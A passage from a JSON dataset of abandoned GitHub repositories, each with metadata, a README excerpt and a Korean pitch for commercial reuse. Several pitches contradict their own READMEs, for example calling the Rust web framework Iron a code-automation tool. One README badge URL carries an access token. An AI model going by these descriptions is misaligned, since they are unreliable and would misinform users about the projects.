웹 서비스\n2. **이벤트 ","readme_excerpt":"# 2016.fossasia.org\nFOSSASIA 2016 Summit\n\nThe site for this repository is at http://2016.fossasia.org\n\n## Schedule\n\nDo not edit the contents of `/schedule/` directly; as they are generated from fossasia/open-event-scraper, any changes will get overwritten.\n\n","composite_score":0.3049,"license_safety_tag":"unknown"},{"name":"argentlabs/argent-x","github_url":"https://github.com/argentlabs/argent-x","stars":40,"language":"TypeScript","license":"NOASSERTION","abandonment_months":15,"description":"# Argent-X 저장소 분석\n\n## 왜 보물인가\n블록체인 지갑 기술을 활용하여 암호화폐 자산을 안전하게 관리하고 거래할 수 있는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래 플랫폼 SaaS**: 개인 투자자가 월 구독료로 안전한 지갑 서비스를 이용하는 형태로, 자산 규모에 따른 차등 요금제 제공\n2. **기업 자산 관리 도구*","readme_excerpt":"<!-- logo -->\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/argentlabs/argent-x/HEAD/assets/readme-header.png\">\n</p>\n\n---\n\n<h3 align='center' style='margin: 1em;'>⬇️ Get <b>Argent X</b> for Starknet today:</h3>\n\n<p align=\"center\">\n  <a href=\"https://chrome.google.com/webstore/detail/argent-x-starknet-wallet/dlcobpjiigpikoobohmabehhmhfoodbb/\">\n    <img src=\"https://raw.githubusercontent.com/argentlabs/argent-x/HEAD/assets/button-download.svg\">\n  </a>\n</p>\n\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=argentlabs_argent-x-private&metric=alert_status&token=37f8b93db6e967b7992252f0e70c62ff6da11bbb)](https://sonarcloud.io/summary/new_code?id=argentlabs_argent-x-private) [![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=argentlabs_argent-x-private&metric=sqale_index&token=37f8b93db6e967b7992252f0e70c62ff6da11bbb)](https://sonarcloud.io/summary/new_code?id=argentlabs_argent-x-private) [![Coverage](https://sonarclo","composite_score":0.3049,"license_safety_tag":"unknown"},{"name":"SteveSanderson/Blazor","github_url":"https://github.com/SteveSanderson/Blazor","stars":5,"language":"C#","license":"unknown","abandonment_months":100,"description":"# Blazor 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 C# 언어로 프로그램을 만들 수 있는 기술로, 기존 웹 개발자들이 새로운 언어를 배우지 않고도 현대적인 웹 애플리케이션을 구축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 기업용 대시보드, 데이터 분석 플랫폼, 프로젝트 관리 도구처럼 복잡한 웹 애플리케이션을 빠르게","readme_excerpt":"# Moved to the ASP.NET org\n\nGreat news! Blazor has become an official ASP.NET repo. Please see the project's new home at [https://github.com/aspnet/blazor](https://github.com/aspnet/blazor)\n","composite_score":0.3049,"license_safety_tag":"unknown"},{"name":"voronianski/oceanic-next-color-scheme","github_url":"https://github.com/voronianski/oceanic-next-color-scheme","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":54,"description":"# Oceanic Next Color Scheme 분석\n\n## 왜 보물인가\n프로그래밍 도구의 시각적 디자인을 제공하는 인기 있는 색상 테마로, 사용자 경험을 개선하고 브랜드 가치를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **코딩 교육 플랫폼**: 학습자 친화적인 색상 테마를 기본 제공하여 교육 만족도 향상\n2. **개발자 도구 SaaS**: ","readme_excerpt":"# Oceanic Next Color Scheme\n\n[![GitHub Tags](https://img.shields.io/github/tag/voronianski/oceanic-next-color-scheme.svg)](https://github.com/voronianski/oceanic-next-color-scheme/tags)\n[![Package Control](https://packagecontrol.herokuapp.com/downloads/Oceanic%20Next%20Color%20Scheme.svg?color=50C32E)](https://packagecontrol.io/packages/Oceanic%20Next%20Color%20Scheme) <a href=\"https://www.buymeacoffee.com/voronianski\" target=\"_blank\"><img src=\"https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png\" height=\"20\" alt=\"Buy Me A Coffee\" style=\"height: auto !important;width: auto !important;\" ></a>\n<!-- [![PayPal](https://camo.githubusercontent.com/e14c85b542e06215f7e56c0763333ef1e9b9f9b7/68747470733a2f2f7777772e70617970616c6f626a656374732e636f6d2f656e5f55532f692f62746e2f62746e5f646f6e6174655f534d2e676966)](https://www.paypal.me/voronianski/5) -->\n\n> Colorful Sublime Text 2/3 color scheme optimized for [babel-sublime](https://github.com/babel/babel-sublime) JavaScript syntax h","composite_score":0.3049,"license_safety_tag":"unknown"},{"name":"iron/iron","github_url":"https://github.com/iron/iron","stars":7,"language":"Rust","license":"mit","abandonment_months":24,"description":"# Iron 저장소 분석\n\n## 왜 보물인가\n코드 작성 시간을 줄여주는 자동화 도구로, 프로그래머들의 반복적인 작업을 효율화할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 코드 생성 웹사이트 (구독형 자동 코딩 보조 서비스)\n2. **내부 업무 도구**: 회사 개발팀의 표준 코드 템플릿 자동 생성 시스템\n3. **","readme_excerpt":"# Iron\n\n[![Build Status](https://secure.travis-ci.org/iron/iron.svg?branch=master)](https://travis-ci.org/iron/iron)\n[![Crates.io Status](http://meritbadge.herokuapp.com/iron)](https://crates.io/crates/iron)\n[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/iron/iron/master/LICENSE)\n\n> Extensible, Concurrency Focused Web Development in Rust.\n\n## Response Timer Example\n\nNote: This example works with the current `iron` code in this repository (master branch). If you are using `iron` 0.6 from crates.io, please refer to the [corresponding example](https://github.com/iron/iron/blob/0.6-maintenance/README.md) in the branch [0.6-maintenance](https://github.com/iron/iron/tree/0.6-maintenance).\n\n```rust\nextern crate iron;\nextern crate time;\n\nuse iron::prelude::*;\nuse iron::{typemap, AfterMiddleware, BeforeMiddleware};\nuse time::precise_time_ns;\n\nstruct ResponseTime;\n\nimpl typemap::Key for ResponseTime { type Value = u64; }\n\nimpl BeforeMiddleware f","composite_score":0.3048,"license_safety_tag":"safe"},{"name":"AndroidAdvanceWithGeektime/Chapter01","github_url":"https://github.com/AndroidAdvanceWithGeektime/Chapter01","stars":12,"language":"C++","license":"unknown","abandonment_months":91,"description":"# AndroidAdvanceWithGeektime/Chapter01 분석\n\n## 왜 보물인가\n안드로이드 앱 개발의 고급 기술을 체계적으로 정리한 교육 자료로, 앱 개발 입문자부터 중급자까지 단계별로 학습할 수 있는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 교육 플랫폼**: 온라인 코딩 학원이나 부트캠프에서 안드로이드 심화 과정의","readme_excerpt":"Chapter01-GEEKTIME\n======\n例子里集成了[Breakpad](https://github.com/google/breakpad) 来获取发生 native crash 时候的系统信息和线程堆栈信息。\n\n注意：由于例子里提供的 minidump_stackwalker 可能由于环境不同，无法启动，建议同学自行编译来获取工具，具体教程可见https://github.com/google/breakpad\n\n\n编译环境\n=======\nAndroid Studio 3.2\nCMAKE\nNDK(使用ndk 16-19版本)\n\n项目构建\n=======\n\n例子采用 [CMAKE](https://developer.android.com/ndk/guides/cmake) 来构建 breakpad  库, 项目可直接导入 AndroidStudio 运行\n\n例子支持`armeabi-v7a`,`arm64-v8a`,`x86` 三种平台。\n\n1. 点击`crash`按钮应用会发生一个native崩溃\n\n2. 生成的 crash信息，如果授予Sdcard权限会优先存放在`/sdcard/crashDump`下，便于我们做进一步的分析。反之会放到目录 `/data/data/com.dodola.breakpad/files/crashDump`\n\n\n![截图](screen.png)\n\nDump 日志分析\n========\n\n1. 将抓取到的日志拉取到本地中\n2. 使用例子中提供的 `tools/mac/minidump_stackwalker` 工具来根据 minidump 文件生成堆栈跟踪log\n```\n\t ./tools/mac/minidump_stackwalk crashDump/***.dmp >crashLog.txt \n```\n\t \n3. 打开文件后可以看到一个详细的 crash 日志，如下\n\n```\nOperating system: Android\n                  0.0.0 Linux 4.4.78-perf-gdd4cbe9-00529-g1a92c1c #1 SMP PREEMPT Thu Nov 22 03:44:52 CST 2018 armv8l\nCPU: arm\n     ARMv1 Qua","composite_score":0.3048,"license_safety_tag":"unknown"},{"name":"Timvde/UserChrome-Tweaks","github_url":"https://github.com/Timvde/UserChrome-Tweaks","stars":8,"language":"CSS","license":"gpl-3.0","abandonment_months":61,"description":"# Timvde/UserChrome-Tweaks 분석\n\n## 왜 보물인가\n파이어폭스 브라우저의 외형과 기능을 자유롭게 커스터마이징할 수 있는 오픈소스 설정 모음으로, 수천 명의 사용자가 원하는 브라우저 개선 방법을 찾고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 파이어폭스 커스터마이징 설정을 자동으로 클라우드에 동기화하고 백업해주는","readme_excerpt":"# A community maintained repository of userChrome.css tweaks for Firefox\n\nEvery file should only contain a single, specific tweak. No full themes or anything. Users of this repository should be able to easily combine the different tweaks into a setup of their liking.\n\nIncompatibilities between different files can happen. There's not much we can do about it. Just keep this in mind.\n\nThe master branch should always track Nightly. When a version merges into beta, a new branch is created for this specific Firefox version. If any code is broken on this branch, it is possible to cherry-pick the necessary commits without pulling other broken code in.\n\nIf you wish to contribute to this repository, please read `CONTRIBUTING.md`.\n","composite_score":0.3048,"license_safety_tag":"restricted"},{"name":"EnggQasim/PIAIC_ISLAMABAD_BATCH3","github_url":"https://github.com/EnggQasim/PIAIC_ISLAMABAD_BATCH3","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":73,"description":"# PIAIC_ISLAMABAD_BATCH3 저장소 분석\n\n## 왜 보물인가\n파키스탄의 대형 AI 교육 프로그램에서 실제 학생들이 만든 프로젝트 모음으로, 초급자부터 중급자 수준의 실무 예제들을 한 곳에서 볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 SaaS**: 이 프로젝트들을 체계화하여 \"AI 학습자를 위한 실제 사례 모음\" 구독 서비스로","readme_excerpt":"","composite_score":0.3048,"license_safety_tag":"unknown"},{"name":"GitInPractice/GitInPractice","github_url":"https://github.com/GitInPractice/GitInPractice","stars":20,"language":"","license":"NOASSERTION","abandonment_months":29,"description":"# GitInPractice 저장소 분석\n\n## 왜 보물인가\n깃(Git)이라는 협업 도구를 실제 프로젝트 예시로 배우게 해주는 교육용 자료로, 개발자들이 일하는 방식을 이해하고 싶은 비전공자에게 훌륭한 입문서입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 SaaS**: 신입사원 온보딩 플랫폼에 포함시켜 깃 사용법을 자동으로 교육하는 서비스\n2. **","readme_excerpt":"# Git In Practice\n\nGit In Practice is an opinionated, intermediate/advanced-level Git book by [@MikeMcQuaid](https://github.com/MikeMcQuaid).\n\n## Table of Contents\n\n1. [Preface](00-Preface.adoc)\n2. [Introduction to Git](01-01-IntroductionToGit.adoc)\n    1. [Local Git](01-LocalGit.adoc)\n    2. [Remote Git](02-RemoteGit.adoc)\n3. [Git Essentials](03-02-GitEssentials.adoc)\n    1. [Filesystem Interactions](03-FilesystemInteractions.adoc)\n    2. [History Visualization](04-HistoryVisualization.adoc)\n    3. [Advanced Branching](05-AdvancedBranching.adoc)\n    4. [Rewriting History and Disaster Recovery](06-RewritingHistoryAndDisasterRecovery.adoc)\n4. [Advanced Git](07-03-AdvancedGit.adoc)\n    1. [Personalizing Git](07-PersonalizingGit.adoc)\n    2. [Vendoring Dependencies as Submodules](08-VendoringDependenciesAsSubmodules.adoc)\n    3. [Working with Subversion](09-WorkingWithSubversion.adoc)\n    4. [GitHub Pull Requests](10-GitHubPullRequests.adoc)\n    5. [Hosting a Repository](11-HostingAReposi","composite_score":0.3047,"license_safety_tag":"unknown"},{"name":"zuopf769/notebook","github_url":"https://github.com/zuopf769/notebook","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":63,"description":"# 저장소 분석: zuopf769/notebook\n\n## 왜 보물인가\n개인의 생각과 정보를 체계적으로 정리하고 관리할 수 있는 디지털 노트북 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 온라인 노트 애플리케이션으로, 개인과 팀이 클라우드에서 메모와 문서를 공유하고 협업할 수 있도록 제공\n- **내부 업무 도구**: 회사 직","readme_excerpt":"# notebook\nmy notebook 📒\n","composite_score":0.3047,"license_safety_tag":"unknown"},{"name":"uzh-rpg/e2calib","github_url":"https://github.com/uzh-rpg/e2calib","stars":19,"language":"Python","license":"MIT","abandonment_months":15,"description":"# uzh-rpg/e2calib 상용화 분석\n\n## 왜 보물인가\n카메라 렌즈의 왜곡을 자동으로 정정하는 기술로, 드론·보안카메라·의료영상 등 영상 품질이 중요한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **영상 정정 SaaS**: 사용자가 사진을 업로드하면 자동으로 렌즈 왜곡을 제거해주는 웹 서비스\n2. **카메라 제조사 내부 도구*","readme_excerpt":"# E2Calib: How to Calibrate Your Event Camera\n\n<p align=\"center\">\n   <img src=\"http://rpg.ifi.uzh.ch/img/papers/CVPRW21_Muglikar.png\" height=\"300\"/>\n</p>\n\nThis repository contains code that implements video reconstruction from event data for calibration as described in the paper [Muglikar et al. CVPRW'21](http://rpg.ifi.uzh.ch/docs/CVPRW21_Muglikar.pdf).\n\nIf you use this code in an academic context, please cite the following work:\n\n[Manasi Muglikar](https://manasi94.github.io/), [Mathias Gehrig](https://magehrig.github.io/), [Daniel Gehrig](https://danielgehrig18.github.io/), [Davide Scaramuzza](http://rpg.ifi.uzh.ch/people_scaramuzza.html), \"How to Calibrate Your Event Camera\", Computer Vision and Pattern Recognition Workshops (CVPRW), 2021\n\n```bibtex\n@InProceedings{Muglikar2021CVPR,\n  author = {Manasi Muglikar and Mathias Gehrig and Daniel Gehrig and Davide Scaramuzza},\n  title = {How to Calibrate Your Event Camera},\n  booktitle = {{IEEE} Conf. Comput. Vis. Pattern Recog. Workshops (","composite_score":0.3047,"license_safety_tag":"safe"},{"name":"C0de8ug/Javaee-tutorial","github_url":"https://github.com/C0de8ug/Javaee-tutorial","stars":5,"language":"Java","license":"unknown","abandonment_months":42,"description":"# C0de8ug/Javaee-tutorial 분석\n\n## 왜 보물인가\nJava 웹 개발을 배우고 싶은 초보자들을 위한 실무 기반 학습 자료로, 복잡한 웹 개발 개념을 단계별로 이해할 수 있게 정리해둔 가치 있는 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유튜브나 블로그 강의를 통해 이 자료를 기반으로 한 유료 교육 코스","readme_excerpt":"# 简介\n这是个简单的教务系统网站,并且结合了图书订购功能,希望这个小DEMO能对大家学习有帮助\n\n# 使用技术 \n\nIoC容器:spring\n\nweb框架:springmvc\n\norm框架:mybatis\n\n安全框架:shiro\n\n数据源:dbcp2\n\n日志: sl4j\n\nJson: Gson\n\n前端框架:Bootstrap\n\n# 起步:\n\n1.初始化项目\n\n1)下载Mysql,创建一个数据库名字为giit,导入create.sql与populate.sql,直接运行其中sql即可\n\n2)下载Tomcat\n\n3)使用Intellij Idea导入项目,之后配置项目启动方式,使用刚才下载好的Tomcat\n  \n4)运行\n\n![image](https://pic4.zhimg.com/v2-87231f2eb533cdab3d3e04c7a89457af_b.png)\n\n# 使用简介:\n\n1.权限介绍:\n\n根据导入的populate.sql,运行网站初始时会存在四个权限角色:\n\n1).管理员,账号为admin\n\n2).学生,账号为student\n\n3).教师,账号为teache\n\n4).供应商,账号为supplier\n\n*密码均为123456*\n\n# 功能介绍:\n##  1.基本信息功能:\n其中可以设置一些基本的学校信息,也就是数据库中的实体-关系,之后就可以基于这些基本的关系信息进行更加复杂的功能,例如选课后可以记录多少学生选择了这门课程,只会教师提交图书后计算图书总数可以通过其中的关系得到\n\n1)系部信息\n\n2)专业信息\n\n3)班级信息\n\n4)课程信息\n\n5)学生管理\n\n![image](https://pic1.zhimg.com/v2-44688d7a989ae25d9db6767a50a208f8_b.png)\n\n\n## 2.图书管理功能:\n1)教师上传图书\n\n2)秘书审批图书\n\n3)查看已审核图书\n\n![image](https://pic3.zhimg.com/v2-3ff2f0da17e8609f85da3b61671cf0de_b.png)\n\n# 数据库表结构:\n![image](https://user-images.githubusercontent.com/40494925/139150830-03dbbff5-0f56-4e74-be79-","composite_score":0.3046,"license_safety_tag":"unknown"},{"name":"WebReflection/hyperHTML","github_url":"https://github.com/WebReflection/hyperHTML","stars":6,"language":"HTML","license":"isc","abandonment_months":34,"description":"# hyperHTML 저장소 분석\n\n## 왜 보물인가\n웹 개발자들이 더 간단하고 빠르게 웹사이트 화면을 만들 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 협업 도구(노션 같은 서비스)의 화면 구성 부분을 더 빠르게 개발하여 출시 속도 단축\n2. **내부 업무 도구**: 기업의 관리자용 대시보드나 보고서 ","readme_excerpt":"# hyper(HTML)\n\n### Maintainance Only\n\nThis module is great, works great, and served me greatly, but there's a pletora of modern, faster, more capable alternatives me, among many other OSS developers, offer so that if obvious bugs are proven to exist, these will be fixed, but there won't be a major release and I won't remove legacy support for stuff that, as previously mentioned, works just fine and it's battle-tested from IE to the latest Chrome.\n\nRemoving that legacy support brings pretty much nothing in terms of size too: this module is already smaller than 90% of alternatives out there, dropping 0.xK so that there's less code that, behind feature detection, is not even used in modern browsers, won't benefit anyone.\n\nThansk for your understanding and for not opening PRs which goal is to drop a check for legacy browsers ... these won't likely be merged ever as that'd be a major release update and I don't think anyone is interested in that.\n\n### 📣 Community Announcement\n\nPlease ask que","composite_score":0.3046,"license_safety_tag":"safe"},{"name":"feross/thanks","github_url":"https://github.com/feross/thanks","stars":16,"language":"JavaScript","license":"unknown","abandonment_months":35,"description":"# feross/thanks 분석 보고서\n\n## 왜 보물인가\n개발자들이 자신이 사용하는 오픈소스 프로젝트의 기여자들을 쉽게 찾아서 감사를 표현하거나 후원할 수 있도록 연결해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회사의 기술 스택에 포함된 모든 오픈소스 라이브러리의 개발자를 한 번에 파악하고 기업 차원의 후원 프로그램을 운","readme_excerpt":"<h1 align=\"center\">\n  <a href=\"https://feross.org/thanks\"><img src=\"https://rawcdn.githack.com/feross/thanks/HEAD/img/vertical.png\" alt=\"Thanks\" width=\"200\"></a>\n  <br>\n</h1>\n\n<h4 align=\"center\">🙌 Give thanks to the open source maintainers you depend on! ✨</h4>\n\n<p align=\"center\">\n  <a href=\"https://travis-ci.org/feross/thanks\"><img src=\"https://img.shields.io/travis/feross/thanks/master.svg\" alt=\"travis\"></a>\n  <a href=\"https://www.npmjs.com/package/thanks\"><img src=\"https://img.shields.io/npm/v/thanks.svg\" alt=\"npm version\"></a>\n  <a href=\"https://www.npmjs.com/package/thanks\"><img src=\"https://img.shields.io/npm/dm/thanks.svg\" alt=\"npm downloads\"></a>\n  <a href=\"https://standardjs.com\"><img src=\"https://img.shields.io/badge/code_style-standard-brightgreen.svg\" alt=\"Standard - JavaScript Style Guide\"></a>\n</p>\n<br>\n\n![example gif](img/example.gif)\n\n> \"Put your money where your love is.\"\n> – The Grateful Dead\n\nOpen source maintainers do the work that makes our awesome apps, websites, ","composite_score":0.3046,"license_safety_tag":"unknown"},{"name":"fossasia/gci14.fossasia.org","github_url":"https://github.com/fossasia/gci14.fossasia.org","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":69,"description":"# GCI 14 FOSSASIA 저장소 분석\n\n## 왜 보물인가\nGoogle Code-In 대회 참가자들을 위한 중앙 관리 플랫폼으로, 전 세계 학생 개발자들의 과제 제출과 평가를 한곳에서 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼 SaaS**: 코딩 학원이나 온라인 교육업체가 학생 과제 제출 및 채점 시스템으로 구독료 모델로 판","readme_excerpt":"[![Build Status](https://travis-ci.org/fossasia/gci14.fossasia.org.svg?branch=master)](https://travis-ci.org/fossasia/gci14.fossasia.org)\n\n# FOSSASIA's site for Google Code-in 2014\nhttps://gci14.fossasia.org\n\nGoogle Code-in is an annual contest sponsored by Google, targeted to pre-university students aged 13-17 year olds, to foster an interest in developing for the open source community in them.\n\nThere exist five different types of tasks for Google Code-in:\n\n1. Code\n2. Documentation/Training\n3. Outreach/research\n4. Quality assurance\n5. User interface\n\nFOSSASIA, established in 2009, is the top Free and Open Source technology event in Asia for developers, start-ups, and contributors. Projects at FOSSASIA range from open hardware to design, graphics and software.\n\n## About\n\nFOSSASIA is a Free and Open Source Software (FOSS) event for developers, officials and users from South-East Asia. Its main goal is to foster FOSS projects in Asia.\n\nFOSSASIA is one of the few mentoring organizations d","composite_score":0.3045,"license_safety_tag":"unknown"},{"name":"SamVerschueren/listr","github_url":"https://github.com/SamVerschueren/listr","stars":5,"language":"JavaScript","license":"mit","abandonment_months":46,"description":"# listr 저장소 분석\n\n## 왜 보물인가\n할 일 목록을 보기 좋게 정렬하고 추적하는 간단하고 가벼운 도구로, 개발자들이 프로젝트 관리를 더 효율적으로 할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 팀 협업 작업 관리 플랫폼으로 제공하여 프리랜서나 소규모 팀의 월 구독료 수익 창출\n2. **내부 업무 도구**: 개발팀이","readme_excerpt":"# listr\n\n[![GitHub Actions](https://github.com/SamVerschueren/listr/workflows/Node/badge.svg)](https://github.com/SamVerschueren/listr/actions)\n[![Coverage Status](https://codecov.io/gh/SamVerschueren/listr/branch/master/graph/badge.svg)](https://codecov.io/gh/SamVerschueren/listr)\n\n> Terminal task list\n\n<img src=\"media/screenshot.gif\">\n\n## Install\n\n```\n$ npm install --save listr\n```\n\n\n## Usage\n\n```js\nimport execa from 'execa';\nimport Listr from 'listr';\n\nconst tasks = new Listr([\n\t{\n\t\ttitle: 'Git',\n\t\ttask: () => {\n\t\t\treturn new Listr([\n\t\t\t\t{\n\t\t\t\t\ttitle: 'Checking git status',\n\t\t\t\t\ttask: () => execa.stdout('git', ['status', '--porcelain']).then(result => {\n\t\t\t\t\t\tif (result !== '') {\n\t\t\t\t\t\t\tthrow new Error('Unclean working tree. Commit or stash changes first.');\n\t\t\t\t\t\t}\n\t\t\t\t\t})\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\ttitle: 'Checking remote history',\n\t\t\t\t\ttask: () => execa.stdout('git', ['rev-list', '--count', '--left-only', '@{u}...HEAD']).then(result => {\n\t\t\t\t\t\tif (result !== '0') {\n\t\t\t\t\t\t\tthrow new Error(","composite_score":0.3044,"license_safety_tag":"safe"},{"name":"fossasia/2017.fossasia.org","github_url":"https://github.com/fossasia/2017.fossasia.org","stars":11,"language":"HTML","license":"unknown","abandonment_months":73,"description":"# fossasia/2017.fossasia.org 상용화 분석\n\n## 왜 보물인가\n오픈소스 컨퍼런스의 웹사이트 템플릿으로, 행사 운영 기관들이 쉽게 자신의 행사 사이트를 만들 수 있도록 도와주는 재사용 가능한 기반 코드입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 행사 관리 SaaS 플랫폼**\n컨퍼런스나 세미나를 여는 단체들이 구독 결제로 이 템플릿을 활","readme_excerpt":"","composite_score":0.3044,"license_safety_tag":"unknown"},{"name":"gtanner/qrcode-terminal","github_url":"https://github.com/gtanner/qrcode-terminal","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":53,"description":"# qrcode-terminal 상업화 분석\n\n## 왜 보물인가\n터미널(검은 화면)에서 QR코드를 바로 만들고 보여줄 수 있어서, 복잡한 설치 없이 간단하게 링크나 정보를 공유할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 백업 연동 플랫폼**\n- 사용자가 터미널에서 한 줄의 명령어로 QR코드 생성 후 휴대폰으로 스캔하여 ","readme_excerpt":"# QRCode Terminal Edition [![Build Status][travis-ci-img]][travis-ci-url]\n\n> Going where no QRCode has gone before.\n\n![Basic Example][basic-example-img]\n\n# Node Library\n\n## Install\n\nCan be installed with:\n\n    $ npm install qrcode-terminal\n\nand used:\n\n    var qrcode = require('qrcode-terminal');\n\n## Usage\n\nTo display some data to the terminal just call:\n\n    qrcode.generate('This will be a QRCode, eh!');\n\nYou can even specify the error level (default is 'L'):\n    \n    qrcode.setErrorLevel('Q');\n    qrcode.generate('This will be a QRCode with error level Q!');\n\nIf you don't want to display to the terminal but just want to string you can provide a callback:\n\n    qrcode.generate('http://github.com', function (qrcode) {\n        console.log(qrcode);\n    });\n\nIf you want to display small output, provide `opts` with `small`:\n\n    qrcode.generate('This will be a small QRCode, eh!', {small: true});\n\n    qrcode.generate('This will be a small QRCode, eh!', {small: true}, function (qrcode) {\n     ","composite_score":0.3044,"license_safety_tag":"safe"},{"name":"beiliao-mobile/BadgeNumberManager","github_url":"https://github.com/beiliao-mobile/BadgeNumberManager","stars":56,"language":"Java","license":"unknown","abandonment_months":103,"description":"# BadgeNumberManager 비즈니스 분석\n\n## 왜 보물인가\n스마트폰 앱의 알림 숫자 표시(빨간 동그라미)를 쉽게 관리할 수 있는 도구로, 앱 개발자들의 반복 작업을 획기적으로 줄여줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 앱 개발자 지원 플랫폼**\n- 개발사들이 구독하여 알림 기능을 클릭 몇 번으로 통합할 수 있는 클라우드","readme_excerpt":"# BadgeNumberManager中文文档\n\n`BadgeNumberManager`支持国产主流手机品牌(华为、小米、OPPO、vivo)的桌面角标设置。\n\n\n# Demo演示截图\n\n![](https://github.com/beiliao-mobile/BadgeNumberManager/raw/master/Screenshots/demo.gif)\n\n\n# 用法\n\n为了支持华为手机的桌面角标设置，我们需要先在`AndroidManifest`里配置以下权限:\n\n```\n<uses-permission android:name=\"com.huawei.android.launcher.permission.CHANGE_BADGE\"/>\n\n```\n\n然后，只需要调用以下方法就可以进行桌面角标的设置（小米手机除外，小米手机请参考demo里的处理方式）：\n\n```\nBadgeNumberManager.from(context).setBadgeNumber(num)\n\n```\n\n# 填坑记录(2017.12.11)\n\n1. 经过测试，目前暂时不支持的机型：华为荣耀6、OPPO A59、OPPO R9，OPPO R11、vivo X9i（截止至2017.12.11）\n\n2. 一开始以为某些机型不支持可能是少了某些跟角标设置相关的权限，于是反编译微信、QQ、支付宝，从这些App中收集`AndroidManifest`里配置的可能跟角标设置相关的权限，并添加到Demo中来测试，后来发现还是不行\n\n3. 针对华为手机，在某些机型上，例如华为 mate9，在`manifest`里除了需要配置`com.huawei.android.launcher.permission.CHANGE_BADGE`权限之外，还需要配置`android.permission.INTERNET`权限才可以正常设置桌面角标（不过一般的App应该都会配置了`android.permission.INTERNET`权限）\n\n4. 关于OPPO手机，在一些较旧的机型上可以正常设置桌面角标，但在一些比较新的机型上（例如OPPO R9，OPPO R11等），只有在通知权限管理中，有“在桌面图标上显示角标”这个选项的App才可以正常设置角标。目前就只发现QQ，微信，钉钉有这个权限，就连支付宝都没","composite_score":0.3044,"license_safety_tag":"unknown"},{"name":"zkat/npx","github_url":"https://github.com/zkat/npx","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":84,"description":"# npx 저장소 분석\n\n## 왜 보물인가\n프로그래밍 초보자도 복잡한 설치 과정 없이 필요한 도구를 바로 실행할 수 있게 만든 편의 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 온보딩 SaaS**: 신입 개발자가 환경 설정 없이 즉시 코딩을 시작할 수 있는 클라우드 개발 환경 서비스\n2. **기업 내부 업무 도구**: IT 담당자가 직원들에게 복","readme_excerpt":"[![npm](https://img.shields.io/npm/v/npx.svg)](https://npm.im/npx) [![license](https://img.shields.io/npm/l/npx.svg)](https://npm.im/npx) [![Travis](https://img.shields.io/travis/zkat/npx.svg)](https://travis-ci.org/zkat/npx) [![AppVeyor](https://ci.appveyor.com/api/projects/status/github/zkat/npx?svg=true)](https://ci.appveyor.com/project/zkat/npx) [![Coverage Status](https://coveralls.io/repos/github/zkat/npx/badge.svg?branch=latest)](https://coveralls.io/github/zkat/npx?branch=latest)\n\n# npx(1) -- execute npm package binaries\n\n## NOTE: This repo has moved to https://github.com/npm/npx.\n\n## SYNOPSIS\n\n`npx [options] <command>[@version] [command-arg]...`\n\n`npx [options] [-p|--package <pkg>]... <command> [command-arg]...`\n\n`npx [options] -c '<command-string>'`\n\n`npx --shell-auto-fallback [shell]`\n\n## INSTALL\n\n`npm install -g npx`\n\n## DESCRIPTION\n\nExecutes `<command>` either from a local `node_modules/.bin`, or from a central cache, installing any packages needed in order for `<command>`","composite_score":0.3043,"license_safety_tag":"unknown"},{"name":"nikgraf/belle","github_url":"https://github.com/nikgraf/belle","stars":6,"language":"JavaScript","license":"mit","abandonment_months":81,"description":"# Belle 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 클릭하고 입력할 수 있는 버튼, 입력창 등의 부품들을 쉽게 만들 수 있는 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 고객 관리 시스템(CRM) 같은 클라우드 서비스를 빠르게 개발하고 출시할 때 사용\n2. **내부 업무 도구**: 회사가 직원용","readme_excerpt":"# Belle\n\nConfigurable React Components with great UX.\n\nWebsite & Documentation: [http://nikgraf.github.io/belle/](http://nikgraf.github.io/belle/)\n\n[<img src=\"https://cloud.githubusercontent.com/assets/223045/8707250/f77634f8-2b34-11e5-92d1-f0b0fe44ade9.png\" width=\"50%\">](http://nikgraf.github.io/belle/)\n\n[![Build Status](https://travis-ci.org/nikgraf/belle.svg)](https://travis-ci.org/nikgraf/belle)\n[![Dependency Status](https://david-dm.org/nikgraf/belle.svg)](https://david-dm.org/nikgraf/belle)\n[![peerDependency Status](https://david-dm.org/nikgraf/belle/peer-status.svg)](https://david-dm.org/nikgraf/belle#info=peerDependencies)\n\n## Getting Started\n\nBelle is available as [npm](http://npmjs.org) package. Once you have npm you can install Belle in your project folder 